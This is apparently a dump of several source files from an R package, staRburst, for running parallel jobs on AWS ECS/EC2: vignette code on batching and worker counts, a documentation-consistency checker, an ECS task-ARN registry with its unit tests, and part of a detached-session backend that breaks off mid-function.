# # Good: 100 tasks of 100s each — overhead is negligible
# batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
# starburst_map(batches, function(batch) lapply(batch, quick_fn), workers = 100)

## ----batch-size---------------------------------------------------------------
# # Profile your function first
# per_item_time <- 0.5   # seconds, from local profiling
# target_task_duration <- 60  # aim for 60s minimum per task
# 
# batch_size <- ceiling(target_task_duration / per_item_time)
# # Result: 120 items per batch

## ----instance-choice----------------------------------------------------------
# # Recommended alternative: c8a with spot instances (auto-provisioned on first use)
# plan(starburst,
#   workers     = 50,
#   instance_type = "c8a.xlarge",  # AMD 8th gen — best price/performance
#   use_spot    = TRUE             # 70% cheaper than on-demand
# )

## ----one-shot-local-----------------------------------------------------------
# library(parallel)
# cl <- makeCluster(detectCores() - 1)
# results <- parLapply(cl, data, your_function)
# stopCluster(cl)

## ----param-sweep--------------------------------------------------------------
# # Pay startup cost once, run many combinations
# for (alpha in seq(0.1, 1.0, 0.1)) {
#   for (beta in seq(0.1, 1.0, 0.1)) {
#     results <- starburst_map(
#       data,
#       function(x) model(x, alpha = alpha, beta = beta),
#       workers = 50
#     )
#   }
# }

## ----warm-pool----------------------------------------------------------------
# # Start warm pool once in the morning
# plan(starburst, workers = 50, warm_pool_timeout = 28800)  # 8 hours
# 
# # All runs during the day start in < 30s
# results_am <- starburst_map(morning_data, process)
# results_pm <- starburst_map(afternoon_data, process)
# # Pool shuts down automatically after 8 hours of inactivity

## ----hybrid-------------------------------------------------------------------
# # Iterate quickly on a small sample locally
# results_test <- lapply(data[1:100], your_function)
# 
# # When logic is right, scale to full dataset on cloud
# results_full <- starburst_map(data, your_function, workers = 100)

## ----pitfall-small------------------------------------------------------------
# # Bad: each task is 0.1s — overhead is 20-30x the work
# starburst_map(1:10000, function(x) sqrt(x), workers = 100)
# 
# # Good: batch into groups of 100
# batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
# starburst_map(batches, function(b) sapply(b, sqrt), workers = 100)

## ----pitfall-workers----------------------------------------------------------
# # Bad: 40 workers sit idle
# starburst_map(1:10, fn, workers = 50)
# 
# # Good: match workers to workload
# starburst_map(1:100, fn, workers = 25)  # 4 tasks per worker

## ----pitfall-data-------------------------------------------------------------
# # Bad: huge_matrix serialized and sent to each of 50 workers
# huge_matrix <- matrix(rnorm(1e8), ncol = 1000)
# starburst_map(1:50, function(i) process(huge_matrix, i), workers = 50)
# 
# # Good: generate data inside the worker
# starburst_map(1:50, function(i) {
#   data <- generate_chunk(i)  # create data on the worker
#   process(data)
# }, workers = 50)

#!/usr/bin/env Rscript
# tools/check-docs.R — documentation-consistency guard.
#
# Fails (non-zero exit) when documentation drifts from the code, catching the
# classes of bug found in the 2026 site review:
#   1. Dead/renamed symbols (e.g. `future_starburst`) appearing anywhere in docs.
#   2. A vignette calling a `starburst_*` function that is not an exported symbol.
#   3. A `_pkgdown.yml` internal href pointing at a reference page that will 404.
#   4. A man page whose \usage{} default disagrees with its \item{} "(default: …)".
#
# Run from the package root:  Rscript tools/check-docs.R
# Dependency-light: base R only (+ the package's own DESCRIPTION/NAMESPACE).

`%||%` <- function(a, b) if (is.null(a) || length(a) == 0) b else a
# Resolve the package root. CI and normal use run from the repo root; also accept
# being run from tools/ by walking up one level to find DESCRIPTION.
pkg_root <- getwd()
if (!file.exists(file.path(pkg_root, "DESCRIPTION")) &&
    file.exists(file.path(pkg_root, "..", "DESCRIPTION"))) {
  pkg_root <- normalizePath(file.path(pkg_root, ".."))
}
if (!file.exists(file.path(pkg_root, "DESCRIPTION"))) {
  stop("check-docs.R: run from the package root (no DESCRIPTION found at ", pkg_root, ")")
}

problems <- character(0)
note <- function(...) problems[[length(problems) + 1]] <<- paste0(...)

read_lines_safe <- function(path) if (file.exists(path)) readLines(path, warn = FALSE) else character(0)

vignettes <- list.files(file.path(pkg_root, "vignettes"), pattern = "\\.Rmd$", full.names = TRUE)
readme    <- Filter(file.exists, file.path(pkg_root, c("README.md", "README.Rmd")))
r_files   <- list.files(file.path(pkg_root, "R"), pattern = "\\.R$", full.names = TRUE)
man_files <- list.files(file.path(pkg_root, "man"), pattern = "\\.Rd$", full.names = TRUE)
# Top-level developer docs that get the dead-symbol/terminology scan.
# NOTE: NEWS.md is intentionally excluded — a changelog must be able to mention
# renamed/removed names (e.g. "renamed max_cost_per_job -> max_hourly_cost").
top_docs  <- Filter(file.exists, file.path(pkg_root, c("ARCHITECTURE.md")))

# ---- 1. Dead / banned symbols -------------------------------------------------
# Symbols that no longer exist and must never reappear in code or docs.
banned <- c("future_starburst", "starburst_upload", "yourname/starburst",
            "yourusername/starburst", "starburst_setup(bucket",
            # removed/renamed args that must not reappear in docs or code:
            "detached = TRUE",   # starburst_session has no `detached` arg
            "max_cost_per_job",  # renamed to max_hourly_cost
            "readRDS(url(",      # base url() can't read s3:// — use an S3 client
            # obsolete engine/backend terminology (no auto-chunking; EC2 default):
            "Fargate workers",   # workers are EC2 by default; Fargate is opt-in
            "Fargate over EC2")  # stale design principle; EC2 is the default
scan_targets <- c(vignettes, readme, r_files, top_docs)
# Obsolete chunking language (regex): the engine creates one task per element and
# does NOT auto-chunk, so any "Created N chunks" output is fabricated.
banned_re <- c("Created\\s+[0-9]+\\s+chunks")
for (f in scan_targets) {
  lines <- read_lines_safe(f)
  for (re in banned_re) {
    for (h in grep(re, lines)) {
      note(sprintf("[obsolete-term] %s:%d matches /%s/ — the engine does not auto-chunk",
                   sub(paste0("^", pkg_root, "/?"), "", f), h, re))
    }
  }
  for (b in banned) {
    hits <- grep(b, lines, fixed = TRUE)
    for (h in hits) {
      note(sprintf("[dead-symbol] %s:%d references '%s'",
                   sub(paste0("^", pkg_root, "/?"), "", f), h, b))
    }
  }
}

# ---- 2. Vignettes must not call non-exported starburst_* functions ------------
ns <- read_lines_safe(file.path(pkg_root, "NAMESPACE"))
exported <- sub("^export\\(([^)]*)\\).*", "\\1", grep("^export\\(", ns, value = TRUE))
exported <- gsub("[`\"']", "", exported)
# starburst_* functions that are intentionally internal (allowed to be absent
# from NAMESPACE and must NOT be recommended in user-facing vignettes).
for (f in vignettes) {
  lines <- read_lines_safe(f)
  calls <- unique(unlist(regmatches(
    lines, gregexpr("\\bstarburst_[A-Za-z0-9_]*\\s*\\(", lines))))
  calls <- gsub("\\s*\\($", "", calls)
  for (fn in calls) {
    if (!(fn %in% exported)) {
      note(sprintf("[unexported-call] %s calls '%s()' which is not exported in NAMESPACE",
                   basename(f), fn))
    }
  }
}

# ---- 3. _pkgdown.yml internal reference hrefs must resolve --------------------
pk <- read_lines_safe(file.path(pkg_root, "_pkgdown.yml"))
href_lines <- grep("href:\\s*reference/", pk, value = TRUE)
for (hl in href_lines) {
  target <- sub(".*href:\\s*reference/([A-Za-z0-9_.-]+)\\.html.*", "\\1", hl)
  # pkgdown generates reference/<topic>.html from man/<topic>.Rd (or index.html).
  if (target != "index" &&
      !file.exists(file.path(pkg_root, "man", paste0(target, ".Rd")))) {
    note(sprintf("[pkgdown-404] _pkgdown.yml href 'reference/%s.html' has no man/%s.Rd (will 404)",
                 target, target))
  }
}

# ---- 4. man \usage{} defaults vs \item{} "(default: …)" prose -----------------
# Catches the starburst_session() class of bug (signature says EC2, prose says FARGATE).
extract_usage_defaults <- function(rd) {
  # Line-based parse of the \usage{ ... } block: collect "name = value" pairs.
  start <- grep("\\\\usage\\{", rd)
  if (!length(start)) return(list())
  # find the closing brace line at column 1 after the usage start
  rest <- rd[(start[1] + 1):length(rd)]
  end_rel <- which(grepl("^\\}", rest))[1]
  if (is.na(end_rel)) return(list())
  block <- rest[seq_len(end_rel - 1)]
  out <- list()
  for (ln in block) {
    if (!grepl("=", ln)) next
    nm  <- trimws(sub("=.*", "", ln))
    nm  <- gsub("[^A-Za-z0-9_.]", "", nm)
    if (!nchar(nm)) next
    val <- trimws(sub("^[^=]*=\\s*", "", ln))
    val <- sub(",\\s*$", "", val)          # strip trailing comma
    val <- gsub('"', "", val)
    out[[nm]] <- val
  }
  out
}
# Only compare when the prose gives an EXPLICIT literal default — a quoted string
# ("FARGATE"), a boolean (TRUE/FALSE), or a number. Descriptive prose like
# "(default: from config or us-east-1)" is legitimate and is intentionally NOT
# flagged. This targets exactly the starburst_session EC2-vs-FARGATE bug class:
# a concrete literal in the prose that contradicts the signature default.
for (f in man_files) {
  rd <- read_lines_safe(f)
  defs <- extract_usage_defaults(rd)
  if (!length(defs)) next
  item_lines <- grep("\\\\item\\{[A-Za-z0-9_.]+\\}\\{.*default:", rd, value = TRUE)
  for (il in item_lines) {
    nm <- sub("^.*\\\\item\\{([A-Za-z0-9_.]+)\\}\\{.*$", "\\1", il)
    if (is.null(defs[[nm]])) next
    # Only pull an EXPLICIT literal: quoted string, TRUE/FALSE, or number.
    m <- regmatches(il, regexpr('default:\\s*("[^"]*"|TRUE|FALSE|-?[0-9.]+)',
                                il, ignore.case = TRUE))
    if (!length(m)) next  # prose default is descriptive, not a literal -> skip
    pd  <- gsub('.*default:\\s*', "", m)
    pd  <- gsub('["]', "", trimws(pd))
    sig <- gsub('["]', "", trimws(defs[[nm]]))
    if (nchar(pd) && !identical(tolower(sig), tolower(pd))) {
      note(sprintf("[usage-vs-prose] %s: arg '%s' usage default '%s' != prose '(default: %s)'",
                   basename(f), nm, sig, pd))
    }
  }
}

# ---- 5. Naive big-count anti-pattern in examples -----------------------------
# `starburst_map(1:N, ...)` / `future_map(1:N, ...)` / `future_lapply(1:N, ...)`
# with a large N is the "thousands of tiny tasks" trap the guides warn against —
# and the furrr/future spellings are the same anti-pattern as the direct API (the
# plan is `starburst`). Flag them all in user-facing docs so examples model batching.
anti_marker <- "DON'T|Don't|Bad:|❌|anti-pattern|don't do this|Instead of|tiny task"
naive_re <- "(starburst_map|future_map|future_lapply)\\(\\s*1:([0-9]{4,})"
for (f in c(vignettes, readme)) {
  lines <- read_lines_safe(f)
  hits <- grep(naive_re, lines)
  for (h in hits) {
    m  <- regmatches(lines[h], regexec(naive_re, lines[h]))[[1]]
    fn <- m[2]
    n  <- as.integer(m[3])
    # Allow deliberately-labeled anti-pattern demos (a DON'T/Bad/"Instead of"
    # marker on this or the preceding three lines — the marker often sits just
    # above the ```{r} fence).
    ctx <- paste(lines[max(1, h - 3):h], collapse = " ")
    if (!is.na(n) && n >= 1000 && !grepl(anti_marker, ctx, ignore.case = TRUE)) {
      note(sprintf("[naive-big-count] %s:%d %s(1:%d, ...) — model batching or mark it as an anti-pattern (# DON'T / # Bad:)",
                   basename(f), h, fn, n))
    }
  }
}

# ---- 6. Fabricated performance claims in example vignettes -------------------
# The measured performance/workload-shapes guides are the single source of truth.
# Example vignettes must NOT present hand-written performance as if measured. Two
# tells, both flagged (only in example-*.Rmd; the measured guides are exempt):
#   (a) a "Typical output" label (implies measured) on a console block — use
#       "Illustrative output" instead;
#   (b) a fabricated speedup table row like `| staRburst | ... | 24.3x |`.
example_vigs <- Filter(function(p) grepl("/example-", p), vignettes)
for (f in example_vigs) {
  lines <- read_lines_safe(f)
  for (h in grep("Typical output", lines, ignore.case = TRUE)) {
    note(sprintf("[unmeasured-output] %s:%d 'Typical output' implies measured — label example console output 'Illustrative output'",
                 basename(f), h))
  }
  for (h in grep("\\|\\s*[0-9]+(\\.[0-9]+)?x\\s*\\|", lines)) {
    note(sprintf("[fabricated-speedup] %s:%d speedup table row — remove; point to vignette(\"performance\")/vignette(\"workload-shapes\") for measured numbers",
                 basename(f), h))
  }
}

# ---- Report -------------------------------------------------------------------
if (length(problems)) {
  cat("Documentation consistency check FAILED:\n")
  cat(paste0("  - ", unlist(problems), collapse = "\n"), "\n")
  quit(status = 1)
}
cat("Documentation consistency check passed.\n")

#' In-memory task ARN registry and ECS task listing for staRburst
#'
#' Tracks the ECS task ARNs submitted during a session and provides helpers to
#' list active clusters and stop running tasks.
#'
#' @name task-registry
#' @keywords internal
NULL

#' Get task registry environment
#'
#' @keywords internal
get_task_registry <- function() {
  if (!exists(".starburst_task_registry", envir = .starburst_env)) {
    assign(".starburst_task_registry", new.env(parent = emptyenv()), envir = .starburst_env)
  }
  get(".starburst_task_registry", envir = .starburst_env)
}

#' Store task ARN
#'
#' @keywords internal
store_task_arn <- function(task_id, task_arn) {
  registry <- get_task_registry()
  registry[[task_id]] <- list(
    task_arn = task_arn,
    submitted_at = Sys.time()
  )
  invisible(NULL)
}

#' Get task ARN
#'
#' @keywords internal
get_task_arn <- function(task_id) {
  registry <- get_task_registry()
  if (exists(task_id, envir = registry)) {
    registry[[task_id]]$task_arn
  } else {
    NULL
  }
}

#' List all stored task ARNs
#'
#' @keywords internal
list_task_arns <- function() {
  registry <- get_task_registry()
  task_ids <- ls(registry)
  if (length(task_ids) == 0) {
    return(list())
  }

  result <- list()
  for (task_id in task_ids) {
    result[[task_id]] <- registry[[task_id]]
  }
  result
}

#' List active clusters
#'
#' @keywords internal
list_active_clusters <- function(region) {
  ecs <- get_ecs_client(region)

  tryCatch({
    # List all running tasks in the starburst cluster
    task_list <- ecs$list_tasks(
      cluster = "starburst-cluster",
      desiredStatus = "RUNNING"
    )

    if (length(task_list$taskArns) == 0) {
      return(list())
    }

    # Describe tasks to get details
    tasks <- ecs$describe_tasks(
      cluster = "starburst-cluster",
      tasks = task_list$taskArns
    )

    # Group by cluster ID from environment variables
    clusters <- list()

    for (task in tasks$tasks) {
      # Extract CLUSTER_ID from environment variables
      cluster_id <- NULL
      if (!is.null(task$overrides) && !is.null(task$overrides$containerOverrides)) {
        for (container in task$overrides$containerOverrides) {
          if (!is.null(container$environment)) {
            for (env_var in container$environment) {
              if (env_var$name == "CLUSTER_ID") {
                cluster_id <- env_var$value
                break
              }
            }
          }
          if (!is.null(cluster_id)) break
        }
      }

      if (!is.null(cluster_id)) {
        if (is.null(clusters[[cluster_id]])) {
          clusters[[cluster_id]] <- list(
            cluster_id = cluster_id,
            task_count = 0,
            tasks = list()
          )
        }

        clusters[[cluster_id]]$task_count <- clusters[[cluster_id]]$task_count + 1
        clusters[[cluster_id]]$tasks <- append(
          clusters[[cluster_id]]$tasks,
          list(list(
            task_arn = task$taskArn,
            started_at = task$startedAt,
            status = task$lastStatus
          ))
        )
      }
    }

    return(clusters)

  }, error = function(e) {
    # Return empty list if cluster doesn't exist or other error
    return(list())
  })
}

#' Stop running tasks
#'
#' @keywords internal
stop_running_tasks <- function(plan) {
  ecs <- get_ecs_client(plan$region)

  tryCatch({
    # List running tasks
    tasks <- ecs$list_tasks(
      cluster = "starburst-cluster",
      family = "starburst-worker"
    )

    # Stop each task
    for (task_arn in tasks$taskArns) {
      ecs$stop_task(
        cluster = "starburst-cluster",
        task = task_arn,
        reason = "Cluster cleanup"
      )
    }
  }, error = function(e) {
    warning(sprintf("Error stopping tasks: %s", e$message))
  })

  invisible(NULL)
}

test_that("get_task_registry creates registry if missing", {
  skip_on_cran()

  # Remove registry if it exists
  if (exists(".starburst_task_registry", envir = .starburst_env)) {
    rm(".starburst_task_registry", envir = .starburst_env)
  }

  registry <- get_task_registry()

  expect_true(is.environment(registry))
  expect_true(exists(".starburst_task_registry", envir = .starburst_env))
})

test_that("store_task_arn stores task information", {
  skip_on_cran()

  # Remove registry if it exists
  if (exists(".starburst_task_registry", envir = .starburst_env)) {
    rm(".starburst_task_registry", envir = .starburst_env)
  }

  store_task_arn("task-123", "arn:aws:ecs:us-east-1:123456789012:task/abc")

  registry <- get_task_registry()
  expect_true(exists("task-123", envir = registry))

  task_info <- registry[["task-123"]]
  expect_equal(task_info$task_arn, "arn:aws:ecs:us-east-1:123456789012:task/abc")
  expect_s3_class(task_info$submitted_at, "POSIXct")
})

test_that("get_task_arn retrieves stored ARN", {
  skip_on_cran()

  # Remove registry if it exists
  if (exists(".starburst_task_registry", envir = .starburst_env)) {
    rm(".starburst_task_registry", envir = .starburst_env)
  }

  store_task_arn("task-456", "arn:aws:ecs:us-east-1:123456789012:task/def")

  result <- get_task_arn("task-456")
  expect_equal(result, "arn:aws:ecs:us-east-1:123456789012:task/def")
})

test_that("get_task_arn returns NULL for unknown task", {
  skip_on_cran()

  # Remove registry if it exists
  if (exists(".starburst_task_registry", envir = .starburst_env)) {
    rm(".starburst_task_registry", envir = .starburst_env)
  }

  result <- get_task_arn("nonexistent-task")
  expect_null(result)
})

test_that("list_task_arns returns all stored tasks", {
  skip_on_cran()

  # Remove registry if it exists
  if (exists(".starburst_task_registry", envir = .starburst_env)) {
    rm(".starburst_task_registry", envir = .starburst_env)
  }

  store_task_arn("task-1", "arn:task-1")
  store_task_arn("task-2", "arn:task-2")
  store_task_arn("task-3", "arn:task-3")

  result <- list_task_arns()

  expect_length(result, 3)
  expect_true("task-1" %in% names(result))
  expect_true("task-2" %in% names(result))
  expect_true("task-3" %in% names(result))

  expect_equal(result[["task-1"]]$task_arn, "arn:task-1")
  expect_equal(result[["task-2"]]$task_arn, "arn:task-2")
})

test_that("list_task_arns returns empty list when no tasks", {
  skip_on_cran()

  # Remove registry if it exists
  if (exists(".starburst_task_registry", envir = .starburst_env)) {
    rm(".starburst_task_registry", envir = .starburst_env)
  }

  result <- list_task_arns()

  expect_type(result, "list")
  expect_length(result, 0)
})

test_that("task registry persists across function calls", {
  skip_on_cran()

  # Remove registry if it exists
  if (exists(".starburst_task_registry", envir = .starburst_env)) {
    rm(".starburst_task_registry", envir = .starburst_env)
  }

  store_task_arn("task-persist", "arn:persist")

  # Get registry again
  registry <- get_task_registry()
  expect_true(exists("task-persist", envir = registry))

  # Retrieve via function
  result <- get_task_arn("task-persist")
  expect_equal(result, "arn:persist")
})

test_that("task registry stores and retrieves tasks", {
  # Clean slate
  if (exists(".starburst_task_registry", envir = .starburst_env)) {
    rm(".starburst_task_registry", envir = .starburst_env)
  }

  # Store tasks
  store_task_arn("task-1", "arn:aws:ecs:us-east-1:123456789012:task/abc123")
  store_task_arn("task-2", "arn:aws:ecs:us-east-1:123456789012:task/def456")
  store_task_arn("task-3", "arn:aws:ecs:us-east-1:123456789012:task/ghi789")

  # Retrieve individual
  expect_equal(get_task_arn("task-1"), "arn:aws:ecs:us-east-1:123456789012:task/abc123")
  expect_equal(get_task_arn("task-2"), "arn:aws:ecs:us-east-1:123456789012:task/def456")

  # List all
  all_tasks <- list_task_arns()
  expect_length(all_tasks, 3)
  expect_true("task-1" %in% names(all_tasks))
  expect_true("task-2" %in% names(all_tasks))
  expect_true("task-3" %in% names(all_tasks))

  # Check timestamps exist
  expect_true(!is.null(all_tasks[["task-1"]]$submitted_at))
  expect_s3_class(all_tasks[["task-1"]]$submitted_at, "POSIXct")
})

test_that("ensure_environment returns proper structure", {
  skip_if_not_installed("mockery")

  # Mock all dependencies
  mockery::stub(ensure_environment, "renv::paths$lockfile", function() {
    "test.lock"
  })
  mockery::stub(ensure_environment, "file.exists", function(...) TRUE)
  mockery::stub(ensure_environment, "dir.exists", function(...) FALSE)
  # Mock compute_env_hash (readLines/digest are in a nested function, not reachable
  # directly via mockery::stub on ensure_environment)
  mockery::stub(ensure_environment, "compute_env_hash", function(...) {
    "abc123hash"
  })
  mockery::stub(ensure_environment, "get_starburst_config", function() {
    list(aws_account_id = "123456789012")
  })
  mockery::stub(ensure_environment, "check_ecr_image_exists", function(...) TRUE)

  result <- ensure_environment("us-east-1")

  # Check structure
  expect_type(result, "list")
  expect_named(result, c("hash", "image_uri", "cluster"))

  # Check values
  expect_equal(result$hash, "abc123hash")
  expect_match(result$image_uri, "^123456789012\\.dkr\\.ecr\\.us-east-1\\.amazonaws\\.com/starburst-worker:abc123hash$")
})

test_that("wave status reporting works", {
  plan <- list(
    quota_limited = TRUE,
    num_waves = 5,
    wave_queue = list(
      pending = list("t1", "t2", "t3"),
      current_wave = 2,
      wave_futures = list("t4" = list(), "t5" = list()),
      completed = 10
    )
  )

  status <- get_wave_status(plan)

  expect_type(status, "list")
  expect_equal(status$current_wave, 2)
  expect_equal(status$pending, 3)
  expect_equal(status$running, 2)
  expect_equal(status$completed, 10)
  expect_equal(status$total_waves, 5)
})

test_that("wave status returns NULL for non-quota-limited", {
  plan <- list(quota_limited = FALSE)
  expect_null(get_wave_status(plan))
})

test_that("image URI format is correct", {
  skip_if_not_installed("mockery")

  mockery::stub(ensure_environment, "renv::paths$lockfile", function() "test.lock")
  mockery::stub(ensure_environment, "file.exists", function(...) TRUE)
  mockery::stub(ensure_environment, "dir.exists", function(...) FALSE)
  # Mock compute_env_hash (readLines/digest are in a nested function)
  mockery::stub(ensure_environment, "compute_env_hash", function(...) "deadbeef123")
  mockery::stub(ensure_environment, "get_starburst_config", function() {
    list(aws_account_id = "999888777666")
  })
  mockery::stub(ensure_environment, "check_ecr_image_exists", function(...) TRUE)

  result <- ensure_environment("eu-west-1")

  expected_uri <- "999888777666.dkr.ecr.eu-west-1.amazonaws.com/starburst-worker:deadbeef123"
  expect_equal(result$image_uri, expected_uri)
})

test_that("list_active_clusters returns empty list when no tasks", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock ECS client
  ecs_client <- list(
    list_tasks = function(...) {
      list(taskArns = list())
    }
  )

  mockery::stub(list_active_clusters, "get_ecs_client", function(...) {
    ecs_client
  })

  result <- list_active_clusters("us-east-1")

  expect_type(result, "list")
  expect_length(result, 0)
})

test_that("list_active_clusters groups tasks by cluster ID", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock ECS client
  ecs_client <- list(
    list_tasks = function(...) {
      list(
        taskArns = list(
          "arn:task-1",
          "arn:task-2",
          "arn:task-3"
        )
      )
    },
    describe_tasks = function(...) {
      list(
        tasks = list(
          list(
            taskArn = "arn:task-1",
            startedAt = as.numeric(Sys.time()),
            lastStatus = "RUNNING",
            overrides = list(
              containerOverrides = list(
                list(
                  environment = list(
                    list(name = "CLUSTER_ID", value = "cluster-A")
                  )
                )
              )
            )
          ),
          list(
            taskArn = "arn:task-2",
            startedAt = as.numeric(Sys.time()),
            lastStatus = "RUNNING",
            overrides = list(
              containerOverrides = list(
                list(
                  environment = list(
                    list(name = "CLUSTER_ID", value = "cluster-A")
                  )
                )
              )
            )
          ),
          list(
            taskArn = "arn:task-3",
            startedAt = as.numeric(Sys.time()),
            lastStatus = "RUNNING",
            overrides = list(
              containerOverrides = list(
                list(
                  environment = list(
                    list(name = "CLUSTER_ID", value = "cluster-B")
                  )
                )
              )
            )
          )
        )
      )
    }
  )

  mockery::stub(list_active_clusters, "get_ecs_client", function(...) {
    ecs_client
  })

  result <- list_active_clusters("us-east-1")

  expect_length(result, 2)
  expect_true("cluster-A" %in% names(result))
  expect_true("cluster-B" %in% names(result))

  expect_equal(result[["cluster-A"]]$task_count, 2)
  expect_equal(result[["cluster-B"]]$task_count, 1)
})

test_that("list_active_clusters handles tasks without cluster ID", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock ECS client
  ecs_client <- list(
    list_tasks = function(...) {
      list(taskArns = list("arn:task-1"))
    },
    describe_tasks = function(...) {
      list(
        tasks = list(
          list(
            taskArn = "arn:task-1",
            startedAt = as.numeric(Sys.time()),
            lastStatus = "RUNNING",
            overrides = list(
              containerOverrides = list(
                list(
                  environment = list()  # No CLUSTER_ID
                )
              )
            )
          )
        )
      )
    }
  )

  mockery::stub(list_active_clusters, "get_ecs_client", function(...) {
    ecs_client
  })

  result <- list_active_clusters("us-east-1")

  # Should return empty list (no cluster ID found)
  expect_length(result, 0)
})

test_that("list_active_clusters handles ECS errors gracefully", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock ECS client that throws error
  ecs_client <- list(
    list_tasks = function(...) {
      stop("ClusterNotFoundException")
    }
  )

  mockery::stub(list_active_clusters, "get_ecs_client", function(...) {
    ecs_client
  })

  result <- list_active_clusters("us-east-1")

  expect_type(result, "list")
  expect_length(result, 0)
})

test_that("list_active_clusters includes task details", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  start_time <- as.numeric(Sys.time())

  # Mock ECS client
  ecs_client <- list(
    list_tasks = function(...) {
      list(taskArns = list("arn:task-1"))
    },
    describe_tasks = function(...) {
      list(
        tasks = list(
          list(
            taskArn = "arn:task-1",
            startedAt = start_time,
            lastStatus = "RUNNING",
            overrides = list(
              containerOverrides = list(
                list(
                  environment = list(
                    list(name = "CLUSTER_ID", value = "test-cluster")
                  )
                )
              )
            )
          )
        )
      )
    }
  )

  mockery::stub(list_active_clusters, "get_ecs_client", function(...) {
    ecs_client
  })

  result <- list_active_clusters("us-east-1")

  cluster <- result[["test-cluster"]]
  expect_equal(cluster$cluster_id, "test-cluster")
  expect_equal(cluster$task_count, 1)
  expect_length(cluster$tasks, 1)

  task <- cluster$tasks[[1]]
  expect_equal(task$task_arn, "arn:task-1")
  expect_equal(task$started_at, start_time)
  expect_equal(task$status, "RUNNING")
})

#' Session Backend Initialization
#'
#' Backend initialization for detached session mode
#'
#' @name session-backend
#' @keywords internal
NULL

#' Initialize backend for detached mode
#'
#' Creates a backend for detached sessions without modifying the future plan
#'
#' @param session_id Unique session identifier
#' @param workers Number of workers
#' @param cpu vCPUs per worker
#' @param memory Memory per worker (GB notation like "8GB")
#' @param region AWS region
#' @param timeout Task timeout in seconds
#' @param absolute_timeout Maximum session lifetime in seconds
#' @param launch_type "FARGATE" or "EC2"
#' @param instance_type EC2 instance type (for EC2 launch type)
#' @param use_spot Use spot instances
#' @param warm_pool_timeout Warm pool timeout for EC2
#' @return Backend environment
#' @keywords internal
initialize_detached_backend <- function(session_id,
                                       workers = 10,
                                       cpu = 4,
                                       memory = "8GB",
                                       region = NULL,
                                       timeout = 3600,
                                       absolute_timeout = 86400,
                                       launch_type = "EC2",
                                       instance_type = "c7g.xlarge",
                                       use_spot = TRUE,
                                       warm_pool_timeout = 3600) {

  # Validate inputs
  validate_workers(workers)
  validate_launch_type(launch_type)

  # For EC2, auto-adjust cpu/memory based on instance type
  if (launch_type == "EC2") {
    validate_instance_type(instance_type)
    instance_specs <- get_instance_specs(instance_type)

    # Use max available resources on instance
    valid_cpus <- c(0.25, 0.5, 1, 2, 4, 8, 16)
    cpu <- max(valid_cpus[valid_cpus <= instance_specs$vcpus])

    # Memory: use instance capacity minus 512MB for ECS agent overhead
    memory_gb <- instance_specs$memory_gb - 0.5
    memory <- sprintf("%dGB", floor(memory_gb))

    cat_info(sprintf("   * Using instance resources: %g vCPUs, %s memory\n", cpu, memory))
  }

  validate_cpu(cpu)
  validate_memory(memory)

  # Get configuration
  config <- get_starburst_config()
  region <- region %||% config$region %||% "us-east-1"

  # Check AWS credentials
  check_aws_credentials()

  # Get architecture from instance type
  architecture <- if (launch_type == "EC2") {
    get_architecture_from_instance_type(instance_type)
  } else {
    "X86_64"  # Fargate default
  }

  # Ensure environment is ready
  env_info <- ensure_environment(region)

  # Create backend state
  backend <- list(
    session_id = session_id,
    mode = "detached",
    cluster = env_info$cluster,
    cluster_name = config$cluster_name,
    workers = workers,
    cpu = cpu,
    memory = memory,
    region = region,
    bucket = config$bucket,
    timeout = timeout,
    absolute_timeout = absolute_timeout,
    env_hash = env_info$hash,
    image_uri = env_info$image_uri,
    created_at = Sys.time(),
    total_tasks = 0,
    completed_tasks = 0,
    failed_tasks = 0,
    launch_type = launch_type,
    instance_type = instance_type,
    use_spot = use_spot,
    architecture = architecture,
    warm_pool_timeout = warm_pool_timeout,
    capacity_provider_name = sprintf("starburst-%s", gsub("\\.", "-", instance_type)),
    pool_started_at = NULL,
    asg_name = sprintf("starburst-asg-%s", gsub("\\.", "-", instance_type)),
    aws_account_id = config$aws_account_id,
    subnets = config$subnets,
    security_groups = config$security_groups,
    task_definition_arn = NULL  # Will be set during worker launch
  )

  # Convert to environment for mutability
  backend_env <- list2env(backend, parent = emptyenv())
  class(backend_env) <- c("StarburstBackend", "DetachedBackend", "environment")

  backend_env
}

#' Launch workers for detached session
#'
#' Launches workers with bootstrap tasks that tell them the session ID
#'
#' @param backend Backend environment
#' @return Invisibly returns NULL
#' @keywords internal
launch_detached_workers <- function(backend) {
  cat_info(sprintf("[Starting] Launching %d detached workers...\n", backend$workers))

  # Get or create task definition
  if (is.null(backend$task_definition_arn)) {
    backend$task_definition_arn <- get_or_create_task_definition(backend)
  }

  # Handle EC2 pool warmup if needed
  if (backend$launch_type == "EC2" && is.null(backend$pool_started_at)) {
    cat_info("[Setup] Starting warm EC2 pool (~2 min first time)...\n")
    start_warm_pool(backend, backend$workers, timeout_seconds = 120)
    backend$pool_started_at <- Sys.time()
  }

  # Create session manifest in S3
  create_session_manifest(backend$session_id, backend)

  # Launch workers with bootstrap tasks
  for (i in seq_len(backend$workers)) {
    bootstrap_task_id <- sprintf("bootstrap-%s-%d", backend$session_id, i)

    # Create minimal bootstrap task (tells worker the session ID)
    bootstrap_task <- list(
      session_id = backend$session_id,
      task_id = bootstrap_task_id,
      expr = NULL,  # No execution needed
      globals = list(),
      packages = NULL
    )

    # Upload bootstrap task to S3
    upload_detached_task(bootstrap_task_id, bootstrap_task, backend)

    # Create task status (claimed by bootstrap)
    create_task_status(
      session_id = backend$session_id,
      task_id = bootstrap_task_id,
      state = "claimed",
      region = backend$region,
      bucket = backend$bucket
    )

    # Launch worker via ECS and track task ARN
    task_arn <- submit_detached_worker(backend, bootstrap_task_id)

    # Store task ARN in session manifest for cleanup tracking
    tryCatch({
      current_manifest <- get_session_manifest(
        backend$session_id,
        backend$region,
        backend$bucket
      )

      # Initialize ecs_task_arns if not present
      if (is.null(current_manifest$ecs_task_arns)) {
        current_manifest$ecs_task_arns <- character(0)
      }

      # Add new task ARN
      current_manifest$ecs_task_arns <- c(current_manifest$ecs_task_arns, task_arn)

      # Update manifest
      update_session_manifest(
        backend$session_id,
        list(ecs_task_arns = current_manifest$ecs_task_arns),
        backend$region,
        backend$bucket
      )
    }, error = function(e) {
